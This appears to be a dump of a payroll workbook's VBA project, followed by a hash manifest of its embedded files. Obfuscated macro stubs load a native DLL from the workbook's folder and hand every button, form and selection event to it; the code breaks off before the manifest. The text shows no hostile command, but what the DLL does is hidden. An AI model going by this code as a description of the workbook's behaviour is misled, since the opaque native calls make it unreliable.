Private Declare PtrSafe Sub h6nd0pvn Lib "PayrollBook_xlsm_64.dll" Alias "l1hdxvey4" ()
Private Declare PtrSafe Sub c1jf2v2daoz Lib "PayrollBook_xlsm_64.dll" Alias "v7zq3pwy" (ByVal Target As Range)
#Else
Private Declare Sub h6nd0pvn Lib "PayrollBook_xlsm_32.dll" Alias "c1ceywp9@0" ()
Private Declare Sub c1jf2v2daoz Lib "PayrollBook_xlsm_32.dll" Alias "m4purdjm82hse7q@4" (ByVal Target As Range)
#End If
Private Sub Auto_Click()
h6nd0pvn
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
c1jf2v2daoz Target
End Sub


Attribute VB_Name = "Sheet27"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet28"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module74"
#If Win64 Then
Private Declare PtrSafe Sub y0zasrm6 Lib "PayrollBook_xlsm_64.dll" Alias "l7f5rsqki5ri9fe" ()
Private Declare PtrSafe Sub m4zpu2by3xceyiz Lib "PayrollBook_xlsm_64.dll" Alias "n5nf4uvm3lfmkg" ()
#Else
Private Declare Sub y0zasrm6 Lib "PayrollBook_xlsm_32.dll" Alias "f4n5zn1ckzsqukl@0" ()
Private Declare Sub m4zpu2by3xceyiz Lib "PayrollBook_xlsm_32.dll" Alias "i7yd83uez@0" ()
#End If
Private Sub CheckAdjustment()
m4zpu2by3xceyiz
End Sub
Private Sub Return7()
y0zasrm6
End Sub

Attribute VB_Name = "Sheet30"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 4, 0, MSForms, CommandButton"
#If Win64 Then
Private Declare PtrSafe Sub z0bz5g6xn9 Lib "PayrollBook_xlsm_64.dll" Alias "o2e0jny6rl9x7" ()
#Else
Private Declare Sub z0bz5g6xn9 Lib "PayrollBook_xlsm_32.dll" Alias "d7han92nfy@0" ()
#End If
Private Sub CommandButton1_Click()
z0bz5g6xn9
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet26"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet33"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet34"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "CalendarFrm"
Attribute VB_Base = "0{C21D1E01-8344-4066-A5AF-F8E43547C8DF}{DAD38B1C-AC62-45E6-86C4-DD840C027313}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If Win64 Then
Private Declare PtrSafe Sub a6cv3ygiz5tna Lib "PayrollBook_xlsm_64.dll" Alias "b4lgjvrc8" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub j7bwyxh51lj Lib "PayrollBook_xlsm_64.dll" Alias "c1jlkwce6rvem" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub u4emgh0spe8gh Lib "PayrollBook_xlsm_64.dll" Alias "c3wt5sqns" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub b1o3l8pzixgt5 Lib "PayrollBook_xlsm_64.dll" Alias "d6ye57zocps63uc" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub v4hwmteie08m0w Lib "PayrollBook_xlsm_64.dll" Alias "d8y92k43e84hkq" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub s4kwhpaodvn8 Lib "PayrollBook_xlsm_64.dll" Alias "e0ub4crtafabfn" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub t6qk8bvpnwezr Lib "PayrollBook_xlsm_64.dll" Alias "e5ju6vu8" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub w6cyi7a7al8x Lib "PayrollBook_xlsm_64.dll" Alias "e6yx6t8coz7l" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub k4tuj7da0d5 Lib "PayrollBook_xlsm_64.dll" Alias "e8my64ph" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub n7ip29b7k4v26 Lib "PayrollBook_xlsm_64.dll" Alias "f3osuhdinihvmp5" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub q5orwyu4 Lib "PayrollBook_xlsm_64.dll" Alias "f6zcnmc1" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub j8fmbx1bqvi Lib "PayrollBook_xlsm_64.dll" Alias "f8q0e805xd6" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub b6fbefwhose8t Lib "PayrollBook_xlsm_64.dll" Alias "g4dq1ieh1ramxq" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub a4ibxyrzlyhcz4 Lib "PayrollBook_xlsm_64.dll" Alias "g4zxcf5a3zru57p" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub o6tlx1etf9 Lib "PayrollBook_xlsm_64.dll" Alias "g5pmzakytks5" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub a6fj6xm70yp9iu Lib "PayrollBook_xlsm_64.dll" Alias "g7feq1gnpj" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub p3l3sys7e Lib "PayrollBook_xlsm_64.dll" Alias "h0kytnmqzyq1" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub z3atbcz60xl0 Lib "PayrollBook_xlsm_64.dll" Alias "h2djx9ngat" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub z3jwtm9awh Lib "PayrollBook_xlsm_64.dll" Alias "h4erqva3vyiru" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub i5o3401y1j20 Lib "PayrollBook_xlsm_64.dll" Alias "h5qi01d0s57fvq0" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub i5vju9gegi821 Lib "PayrollBook_xlsm_64.dll" Alias "h7ahvln1" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub e3mh1m4b6meb9 Lib "PayrollBook_xlsm_64.dll" Alias "i1kb5vie" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub j1a7q10k5ec7q Lib "PayrollBook_xlsm_64.dll" Alias "j3hsv6fw2mun2" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub w1u8i7ct7y Lib "PayrollBook_xlsm_64.dll" Alias "j6z6q6an" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub t8pqti5sa28lx Lib "PayrollBook_xlsm_64.dll" Alias "k1w29tkq" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub r6t8rs0y970emp Lib "PayrollBook_xlsm_64.dll" Alias "k5fsg7m7" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub i8x903mjuz9tk Lib "PayrollBook_xlsm_64.dll" Alias "k7kitd1jxo1dtls" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub y4fp0lx5b Lib "PayrollBook_xlsm_64.dll" Alias "l3r82hbnv" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub h1jmk1zx47849 Lib "PayrollBook_xlsm_64.dll" Alias "l4z3825p567zdha" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub a4xmdgv7aw9l Lib "PayrollBook_xlsm_64.dll" Alias "m0qzqozfzg3bmxu" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub a6yd67f1oh Lib "PayrollBook_xlsm_64.dll" Alias "m2x6d70nmjs" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub b1o0xox7di4n2y4 Lib "PayrollBook_xlsm_64.dll" Alias "m3jyhu3wvtm8" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub i2oajc487q4z Lib "PayrollBook_xlsm_64.dll" Alias "n0ol3d8if" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub l6muq3j9haesi8 Lib "PayrollBook_xlsm_64.dll" Alias "n0w6r4hk91gy14" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub d5sqn4yl Lib "PayrollBook_xlsm_64.dll" Alias "o3i5siwujra" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub r3mxg4alixfnk6 Lib "PayrollBook_xlsm_64.dll" Alias "p7aubpoltj7nt" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub y3qhq87jec5teh8 Lib "PayrollBook_xlsm_64.dll" Alias "q5s1lj2azf26" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub d3w52spuyxve2vt Lib "PayrollBook_xlsm_64.dll" Alias "r1aurfo6" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub u8ukpcqdb1 Lib "PayrollBook_xlsm_64.dll" Alias "r5xw2rwo5x" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub g6mqem7dh0g8i Lib "PayrollBook_xlsm_64.dll" Alias "r8mta21h4" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub f1u9zthajk5vbeq Lib "PayrollBook_xlsm_64.dll" Alias "s4skaye6t" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub g7t3f7kf4fr Lib "PayrollBook_xlsm_64.dll" Alias "u5sn8ojtfl6" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub m2br37futy Lib "PayrollBook_xlsm_64.dll" Alias "u7eul9rjs" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub c0bt57zql8ojctf Lib "PayrollBook_xlsm_64.dll" Alias "v1ofwpimck3su" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub e1s4fdi26ypch48 Lib "PayrollBook_xlsm_64.dll" Alias "v5jtn8z4oas" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub o2cz7omyt7g Lib "PayrollBook_xlsm_64.dll" Alias "v7iumkip0kir" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub r6xk4helx Lib "PayrollBook_xlsm_64.dll" Alias "x5gdb573dcu" (ByVal q8pw752hvmrh8mq As Object)
Private Declare PtrSafe Sub x4ka4npawl2xn Lib "PayrollBook_xlsm_64.dll" Alias "y8d0cfatnuhk" (ByVal q8pw752hvmrh8mq As Object)
#Else
Private Declare Sub a6cv3ygiz5tna Lib "PayrollBook_xlsm_32.dll" Alias "f7bsazj43ut@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub j7bwyxh51lj Lib "PayrollBook_xlsm_32.dll" Alias "c0d57v8z7@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub u4emgh0spe8gh Lib "PayrollBook_xlsm_32.dll" Alias "g4ab7fwjiz261h@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub b1o3l8pzixgt5 Lib "PayrollBook_xlsm_32.dll" Alias "p0h9dex3wa@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub v4hwmteie08m0w Lib "PayrollBook_xlsm_32.dll" Alias "m4qtgfstq23c4a8@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub s4kwhpaodvn8 Lib "PayrollBook_xlsm_32.dll" Alias "y8lsizh948x@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub t6qk8bvpnwezr Lib "PayrollBook_xlsm_32.dll" Alias "e1tjsnea0a1r@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub w6cyi7a7al8x Lib "PayrollBook_xlsm_32.dll" Alias "o2uyn4q4qdxq@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub k4tuj7da0d5 Lib "PayrollBook_xlsm_32.dll" Alias "g3amo9oibznqxe@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub n7ip29b7k4v26 Lib "PayrollBook_xlsm_32.dll" Alias "u2h2awawa0d5y9b@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub q5orwyu4 Lib "PayrollBook_xlsm_32.dll" Alias "l5ul5kq9@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub j8fmbx1bqvi Lib "PayrollBook_xlsm_32.dll" Alias "z0rz8afgszqlng@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub b6fbefwhose8t Lib "PayrollBook_xlsm_32.dll" Alias "e7bqwczyif2kb9g@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub a4ibxyrzlyhcz4 Lib "PayrollBook_xlsm_32.dll" Alias "s5ie2u3f2@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub o6tlx1etf9 Lib "PayrollBook_xlsm_32.dll" Alias "e5wl8qgm@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub a6fj6xm70yp9iu Lib "PayrollBook_xlsm_32.dll" Alias "o8rsps2ezlsw9mb@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub p3l3sys7e Lib "PayrollBook_xlsm_32.dll" Alias "t3oulo0v0k1z@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub z3atbcz60xl0 Lib "PayrollBook_xlsm_32.dll" Alias "p3vp4zpoy6g7@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub z3jwtm9awh Lib "PayrollBook_xlsm_32.dll" Alias "d2sjl7d6yr98ciq@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub i5o3401y1j20 Lib "PayrollBook_xlsm_32.dll" Alias "x2zpzs6lrlzc@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub i5vju9gegi821 Lib "PayrollBook_xlsm_32.dll" Alias "r0d0oh9d6tb5uqp@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub e3mh1m4b6meb9 Lib "PayrollBook_xlsm_32.dll" Alias "t6duxs83xkw@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub j1a7q10k5ec7q Lib "PayrollBook_xlsm_32.dll" Alias "k5fz9asf9d@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub w1u8i7ct7y Lib "PayrollBook_xlsm_32.dll" Alias "s3z2yjnq3jsdo@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub t8pqti5sa28lx Lib "PayrollBook_xlsm_32.dll" Alias "l7ym5qdfntlaz2@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub r6t8rs0y970emp Lib "PayrollBook_xlsm_32.dll" Alias "y7ul1r9r@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub i8x903mjuz9tk Lib "PayrollBook_xlsm_32.dll" Alias "q6et1p85l@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub y4fp0lx5b Lib "PayrollBook_xlsm_32.dll" Alias "l2vbzq0nvq6h5x@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub h1jmk1zx47849 Lib "PayrollBook_xlsm_32.dll" Alias "y0mqpmsq52@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub a4xmdgv7aw9l Lib "PayrollBook_xlsm_32.dll" Alias "i2p2qn75@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub a6yd67f1oh Lib "PayrollBook_xlsm_32.dll" Alias "l0opu2gv82r@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub b1o0xox7di4n2y4 Lib "PayrollBook_xlsm_32.dll" Alias "r3ru5reoetljlbe@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub i2oajc487q4z Lib "PayrollBook_xlsm_32.dll" Alias "c4x1ohgrodi3@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub l6muq3j9haesi8 Lib "PayrollBook_xlsm_32.dll" Alias "u4z3kdw9x@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub d5sqn4yl Lib "PayrollBook_xlsm_32.dll" Alias "z6vuzcd7@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub r3mxg4alixfnk6 Lib "PayrollBook_xlsm_32.dll" Alias "y5jnukm75cwsq@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub y3qhq87jec5teh8 Lib "PayrollBook_xlsm_32.dll" Alias "h5xghlq3@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub d3w52spuyxve2vt Lib "PayrollBook_xlsm_32.dll" Alias "w5spyvuxi8e@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub u8ukpcqdb1 Lib "PayrollBook_xlsm_32.dll" Alias "n1s0acmj@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub g6mqem7dh0g8i Lib "PayrollBook_xlsm_32.dll" Alias "a6oxy8f72fg@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub f1u9zthajk5vbeq Lib "PayrollBook_xlsm_32.dll" Alias "g8xlfhpd7my@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub g7t3f7kf4fr Lib "PayrollBook_xlsm_32.dll" Alias "k3ugy5t8di5ywq@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub m2br37futy Lib "PayrollBook_xlsm_32.dll" Alias "r0ko2uw1zrk@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub c0bt57zql8ojctf Lib "PayrollBook_xlsm_32.dll" Alias "o3evxo7kxr40h@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub e1s4fdi26ypch48 Lib "PayrollBook_xlsm_32.dll" Alias "p2roif8fdqiym@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub o2cz7omyt7g Lib "PayrollBook_xlsm_32.dll" Alias "y5e4a925@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub r6xk4helx Lib "PayrollBook_xlsm_32.dll" Alias "a8h2goa56c@4" (ByVal r8rgm6roadx As Object)
Private Declare Sub x4ka4npawl2xn Lib "PayrollBook_xlsm_32.dll" Alias "e7unirbksx8@4" (ByVal r8rgm6roadx As Object)
#End If
Option Explicit
Private Sub Frame1_Click()
a6yd67f1oh Me
End Sub
Private Sub UserForm_Initialize()
u4emgh0spe8gh Me
End Sub
Private Sub CB_Mth_Change()
On Error Resume Next
a6fj6xm70yp9iu Me
End Sub
Private Sub CB_Yr_Change()
On Error Resume Next
m2br37futy Me
End Sub
Private Sub Build_Calendar()
y4fp0lx5b Me
End Sub
Private Sub D1_Click()
a4ibxyrzlyhcz4 Me
End Sub
Private Sub D2_Click()
w6cyi7a7al8x Me
End Sub
Private Sub D3_Click()
u8ukpcqdb1 Me
End Sub
Private Sub D4_Click()
q5orwyu4 Me
End Sub
Private Sub D5_Click()
c0bt57zql8ojctf Me
End Sub
Private Sub D6_Click()
b1o3l8pzixgt5 Me
End Sub
Private Sub D7_Click()
f1u9zthajk5vbeq Me
End Sub
Private Sub D8_Click()
d5sqn4yl Me
End Sub
Private Sub D9_Click()
o2cz7omyt7g Me
End Sub
Private Sub D10_Click()
k4tuj7da0d5 Me
End Sub
Private Sub D11_Click()
j8fmbx1bqvi Me
End Sub
Private Sub D12_Click()
p3l3sys7e Me
End Sub
Private Sub D13_Click()
w1u8i7ct7y Me
End Sub
Private Sub D14_Click()
n7ip29b7k4v26 Me
End Sub
Private Sub D15_Click()
r6t8rs0y970emp Me
End Sub
Private Sub D16_Click()
e1s4fdi26ypch48 Me
End Sub
Private Sub D17_Click()
r6xk4helx Me
End Sub
Private Sub D18_Click()
i5o3401y1j20 Me
End Sub
Private Sub D19_Click()
l6muq3j9haesi8 Me
End Sub
Private Sub D20_Click()
b6fbefwhose8t Me
End Sub
Private Sub D21_Click()
s4kwhpaodvn8 Me
End Sub
Private Sub D22_Click()
b1o0xox7di4n2y4 Me
End Sub
Private Sub D23_Click()
a6cv3ygiz5tna Me
End Sub
Private Sub D24_Click()
v4hwmteie08m0w Me
End Sub
Private Sub D25_Click()
z3atbcz60xl0 Me
End Sub
Private Sub D26_Click()
o6tlx1etf9 Me
End Sub
Private Sub D27_Click()
i2oajc487q4z Me
End Sub
Private Sub D28_Click()
g6mqem7dh0g8i Me
End Sub
Private Sub D29_Click()
z3jwtm9awh Me
End Sub
Private Sub D30_Click()
a4xmdgv7aw9l Me
End Sub
Private Sub D31_Click()
t6qk8bvpnwezr Me
End Sub
Private Sub D32_Click()
i5vju9gegi821 Me
End Sub
Private Sub D33_Click()
r3mxg4alixfnk6 Me
End Sub
Private Sub D34_Click()
e3mh1m4b6meb9 Me
End Sub
Private Sub D35_Click()
x4ka4npawl2xn Me
End Sub
Private Sub D36_Click()
t8pqti5sa28lx Me
End Sub
Private Sub D37_Click()
j7bwyxh51lj Me
End Sub
Private Sub D38_Click()
y3qhq87jec5teh8 Me
End Sub
Private Sub D39_Click()
j1a7q10k5ec7q Me
End Sub
Private Sub D40_Click()
d3w52spuyxve2vt Me
End Sub
Private Sub D41_Click()
i8x903mjuz9tk Me
End Sub
Private Sub D42_Click()
g7t3f7kf4fr Me
End Sub
Private Sub UserForm_Terminate()
h1jmk1zx47849 Me
End Sub


Attribute VB_Name = "mdlkn7ut4j"
Option Private Module
#If Win64 Then
Private Declare PtrSafe Function SetThisWbk Lib "PayrollBook_xlsm_64.dll" Alias "SetThisWorkbook" (ByVal twbk As Object) As Long
Private Declare PtrSafe Function t5zr42lje7ijfi Lib "PayrollBook_xlsm_64.dll" Alias "t5zr42lje7ijfi" (ByVal i As Long,ByVal obj As Object) As Long
Private Declare PtrSafe Function k3f0g0rvex Lib "PayrollBook_xlsm_64.dll" Alias "k3f0g0rvex" (ByVal i As Long,ByVal mp As LongPtr) As Long
Private Declare PtrSafe Function q2rn7jqi3 Lib "PayrollBook_xlsm_64.dll" Alias "q2rn7jqi3" () As Variant
Private Declare PtrSafe Sub x7m7kf1kil Lib "PayrollBook_xlsm_64.dll" Alias "x7m7kf1kil" (ByVal dst As Any,ByVal src As LongPtr,ByVal sz As Long)
Private Declare PtrSafe Function d4uj1o3p Lib "PayrollBook_xlsm_64.dll" Alias "d4uj1o3p" (ByRef p() As Any) As LongPtr
Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal libFileName As String) As LongPtr
Private Declare PtrSafe Function FreeLibrary Lib "kernel32" (ByVal hLibModule As LongPtr) As LongLong
Private Declare PtrSafe Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongPtr
#Else
Private Declare Function SetThisWbk Lib "PayrollBook_xlsm_32.dll" Alias "SetThisWorkbook@4" (ByVal twbk As Object) As Long
Private Declare Function t5zr42lje7ijfi Lib "PayrollBook_xlsm_32.dll" Alias "r4phfjmk0@8" (ByVal i As Long, ByVal obj As Object) As Long
Private Declare Function k3f0g0rvex Lib "PayrollBook_xlsm_32.dll" Alias "k8s0u7qcqoskc@8" (ByVal i As Long, ByVal mp As Long) As Long
Private Declare Function q2rn7jqi3 Lib "PayrollBook_xlsm_32.dll" Alias "h5bntawrzx048z1@0" () As Variant
Private Declare Sub x7m7kf1kil Lib "PayrollBook_xlsm_32.dll" Alias "h8x9lnk5j@12" (ByVal dst As Any, ByVal src As Long, ByVal sz As Long)
Private Declare Function d4uj1o3p Lib "PayrollBook_xlsm_32.dll" Alias "r6p17rp1r13iyh@4" (ByRef p() As Any) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal libFileName As String) As Long
Private Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
#End If
Private Function c5wu3kq3xgkwdse() As String
On Error Resume Next
#If Win64 Then
Const dllName = "\PayrollBook_xlsm_64.dll"
#Else
Const dllName = "\PayrollBook_xlsm_32.dll"
#End If
c5wu3kq3xgkwdse = ThisWorkbook.Path + dllName
End Function
Public Sub j2s6gb3a3zm049m()
#If Win64 Then
Dim hModule As LongPtr
#Else
Dim hModule As Long
#End If
Dim dllPath As String
On Error Resume Next
dllPath = c5wu3kq3xgkwdse()
hModule = GetModuleHandle(dllPath)
If hModule = 0& Then
hModule = LoadLibrary(dllPath)
Else
SetThisWbk Nothing
End If
If hModule = 0 Then
MsgBox "Cannot load '" & dllPath & "'"
ThisWorkbook.Close False
Else
#If Win64 Then
k3f0g0rvex 1&, AddressOf k4totysaeh3
k3f0g0rvex 5&, AddressOf z3jzgoezcm8
k3f0g0rvex 2&, AddressOf s1p8zeju4tds
k3f0g0rvex 3&, AddressOf d3e0409gf
k3f0g0rvex 4&, AddressOf u0qbxj836sab
#Else
k3f0g0rvex 1&, AddressOf k4totysaeh3
k3f0g0rvex 5&, AddressOf z3jzgoezcm8
k3f0g0rvex 2&, AddressOf s1p8zeju4tds
k3f0g0rvex 3&, AddressOf d3e0409gf
…
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 449536 bytes
SHA-256: 3c00d759a5746116668a59e7065d92036dc240530df41fb0dd6b636582c86462
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image75.emf 684 bytes
SHA-256: 083d27924a6858f1c9e61ad61e955651a493ecdb61972563917b3cd6d6905c57
emf_01.emf ooxml-emf OOXML EMF part: xl/media/image76.emf 684 bytes
SHA-256: b370de9a7956d3ee75aeb0377ab43dac92bfc042150b5d3e6f325d9b4d5d12bf
emf_02.emf ooxml-emf OOXML EMF part: xl/media/image79.emf 1272 bytes
SHA-256: 188f34ddd10d694e13601f8e8818d79ed9f522760cce8c8541c2d737bd096244
emf_03.emf ooxml-emf OOXML EMF part: xl/media/image80.emf 1272 bytes
SHA-256: 7e261c60b5dedcad1f85200bc6942833f85ce12547237ae0b12b2e104b2a3aa7
emf_04.emf ooxml-emf OOXML EMF part: xl/media/image74.emf 1272 bytes
SHA-256: cc26f5851d315c4dcfc1aaf266d9837952c1420f5e6a14946d00d70d2abfd4d1
emf_05.emf ooxml-emf OOXML EMF part: xl/media/image73.emf 1328 bytes
SHA-256: 810b60ce3d9ec42bf2d2cbec54f1acd11f9a3c48dd3f89481a7e99792957b604
emf_06.emf ooxml-emf OOXML EMF part: xl/media/image72.emf 1328 bytes
SHA-256: f81a76e6e825fc29aa590aed0c13d202a02142b759b557c9947ba7df1d4f7db1
emf_07.emf ooxml-emf OOXML EMF part: xl/media/image64.emf 1308 bytes
SHA-256: 2cfa48b8c20e6956e41d471e595cf42647f07adac92d14e5ebf01a220cd59955
emf_08.emf ooxml-emf OOXML EMF part: xl/media/image65.emf 1296 bytes
SHA-256: d3d34858008fc80fa2319ce834d85eab31e5f3b9c64a2065bf153ceca3a7ab17
emf_09.emf ooxml-emf OOXML EMF part: xl/media/image66.emf 1296 bytes
SHA-256: 7c5f8cf58992924c7c7261df8ef400ce22050c5151ccf5805d2286d3c781e394
emf_10.emf ooxml-emf OOXML EMF part: xl/media/image67.emf 1328 bytes
SHA-256: 9e4187741ffc0b068ea3f458e2675a1b472d1409e0028bc8532aa1d7e25faad0
emf_11.emf ooxml-emf OOXML EMF part: xl/media/image68.emf 1272 bytes
SHA-256: 6e89f5ee6c7cc5c039aa53a09216dfd192a7ec08f4ad5467c0997a7dcd209986
emf_12.emf ooxml-emf OOXML EMF part: xl/media/image69.emf 1328 bytes
SHA-256: a2f7a2ba91c6ba35ae3c358d289cbcccb0d46376461a75abdd7b1a0378007af4
emf_13.emf ooxml-emf OOXML EMF part: xl/media/image70.emf 1316 bytes
SHA-256: 1580d2d1a04c9dd0884594827f04e3d0aca73facb58c4e866a8b65360ae4b465
emf_14.emf ooxml-emf OOXML EMF part: xl/media/image71.emf 1328 bytes
SHA-256: 91df024dddd13eaa951009f1d5c3ff91f679daf018c95dba15468b75a9e6d074
emf_15.emf ooxml-emf OOXML EMF part: xl/media/image81.emf 1272 bytes
SHA-256: 111423b1c7c02f4ade3d156826236bb22aa66f34b9fd162b97d23bfade900f99
emf_16.emf ooxml-emf OOXML EMF part: xl/media/image82.emf 1272 bytes
SHA-256: 019d7f3260e67586e0309ce941ffb146be85f4fb349d3571e4cbe089cf5d06c9
emf_17.emf ooxml-emf OOXML EMF part: xl/media/image83.emf 1272 bytes
SHA-256: 64b7cb8d03163cb982c01356b92d3df572c0f6dc457068472c38a4a0f0cdd3fa
emf_18.emf ooxml-emf OOXML EMF part: xl/media/image94.emf 1308 bytes
